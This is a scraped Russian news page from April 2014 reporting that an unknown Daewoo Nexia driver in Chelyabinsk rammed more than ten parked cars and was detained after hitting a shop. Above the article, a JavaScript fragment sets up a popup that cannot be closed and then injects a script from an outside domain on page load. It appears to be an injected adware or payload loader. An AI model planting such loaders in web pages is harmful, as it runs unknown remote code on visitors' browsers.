, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

В Ленинском районе Челябинска неизвестный на Daewoo Nexia протаранил более 10 припаркованных автомобилей

Сегодня, 5 апреля, около 17:00 в одном из домов по улице Шота Руставели неизвестный водитель Daewoo Nexia разбил более десяти автомобилей, припаркованных у домов. О происшествии стало известно благодаря сообщениям в социальных сетях многочисленных очевидцев.

Как написал один из свидетелей произошедшего, скрывающийся под ником robot_spamer, невменяемый водитель "Нексии" сносил все авто, оказавшиеся у него на пути. Некоторые хозяева поврежденных авто, вышедшие на звук сработавшей сигнализации, бросались в погоню за злоумышленником прямо в домашней одежде. Угомонился "гонщик" только после того, как врезался в "Люкс вода", расположенный в доме 25 по улице Шота Руставели. Выяснилось, что он вез двоих пассажиров. На место происшествия прибыли сотрудники полиции. Нарушители задержаны, точное количество поврежденных машин и сумма урона уточняется.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
2:12 - 06 апреля 2014
|
автор: U-RSS
|
(1 455)
|
(0)

Комментарии (0)

Я человек
Я бот